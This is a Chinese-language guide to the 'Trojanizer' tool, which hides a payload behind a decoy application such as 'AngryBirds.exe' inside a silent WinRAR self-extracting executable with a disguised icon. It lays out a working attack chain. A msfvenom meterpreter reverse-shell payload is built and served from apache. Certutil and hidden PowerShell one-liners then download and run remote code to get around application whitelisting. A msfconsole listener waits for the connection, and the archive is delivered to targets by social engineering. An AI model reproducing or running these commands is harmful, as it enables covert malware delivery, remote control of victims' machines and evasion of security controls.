Trojanizer工具使用WinRAR(SFX自解压文件)将用户输入的两个文件压缩并转换为SFX可执行文件(.exe)保存。sfx文件在执行时会同时运行两个文件(我们的有效载荷和应用程序在同时运行)。
为了减少文件在执行时被发现的可疑性,trojanizer会尝试用用户选择的图标替换sfx文件的默认图标(.ico),并且压缩所有的SFX存档沙盒信息(Silent = 1 | Overwrite = 1 )。
Trojanizer不会构建木马,但从目标的角度来看,它会模仿木马的行为(在后台执行有效负载,而合法应用程序在前台执行)。
依赖(后端应用程序)
Zenity(bash-GUI)| Wine(x86 | x64)| WinRAr.exe(已安装在wine中)
“Trojanizer.sh会根据需要下载/安装所有依赖关系
在第一次尝试运行该工具之前,建议在配置文件中编辑配置选项:SYSTEM_ARCH = [your_sys_arch]
被允许的有效载荷
.exe | .bat | .vbs | .ps1
“windows / SFX可以自动提取并执行所有的有效载荷”
提示:如果在配置文件中选择’SINGLE_EXEC = ON’,那么trojanizer将接受输入的任何类型的扩展。
接受的合法的文件(诱饵)
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | .ppt | 等等。
“windows / SFX可以自动提取并执行的所有应用程序”
更多设置
Trojanizer高级选项只能在配置文件中访问且只能在运行主工具Trojanizer.sh之前对它们进行配置。
-
预设高级选项
在提取/执行两个压缩文件(SFX文件)之前,Trojanizer可以被配置为执行命令和应用。这允许用户在实际中在目标系统提取文件之前利用预先安装的软件执行远程命令。如果激活,trojanizer会在(zenity沙箱)执行命令 -
单可执行文件
让我们看看下面的场景:你有一个DLL负载输入,你需要提取时执行,但sfx文件不能直接执行dll文件,这个设置允许用户输入一个批处理脚本(.bat),它将成为用于执行dll负载。Trojanizer需要做的就是指示SFX归档文件解压缩这两个文件,然后执行script.bat
此模式将其默认行为切换为压缩用户输入的两个文件,但仅在提取时执行其中的一个文件(输入的2º文件将被执行)…
TROJANIZER和应用白名单绕过
许多人已经完成了许多令人敬畏的工作,特别是@subTee,我们在这里最终想要的是关于应用程序的白名单绕过:执行任意代码滥用Microsoft内置二进制文件。 Windows 在线下载远程负载并执行任意代码
以下练习描述了如何使用trojanizer’单文件模式’和’Presetup’高级开关来删除(远程下载)并使用’certutil’或’powershell’一句话木马绕过白名单
-
使用metasploit来构建我们的有效载荷
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe -
将payload.exe复制到apache2 webroot并启动服务
cp payload.exe /var/www/html/payload.exeservice apache2 start -
编辑Trojanizer’设置’文件并激活:
PRE_SETUP=ON
SINGLE_EXEC=ON -
运行trojanizer工具
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico -
开始监听,并使用社交工具将sfx存档发送到目标
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
当自解压文件执行时,它会从我们的Apache2 web服务器下载payload.exe并提取“screenshot.png”和“AngryBirds.exe”(最后一个将作为诱饵被执行)之前执行它
的跟随oneliner用途’powershell(下载文件+启动)'方法实现与以前的’certutil’相同的练习。
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'
后续的oneliner使用’powershell(IEX +下载字符串)'方法来实现几乎相同(payload.ps1不接触磁盘)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
下载/安装
-
Download framework from github
git clone https://github.com/r00t-3xp10it/trojanizer.git -
Set files execution permitions
cd trojanizer
sudo chmod +x *.sh -
config framework
nano settings -
Run main tool
sudo ./Trojanizer.sh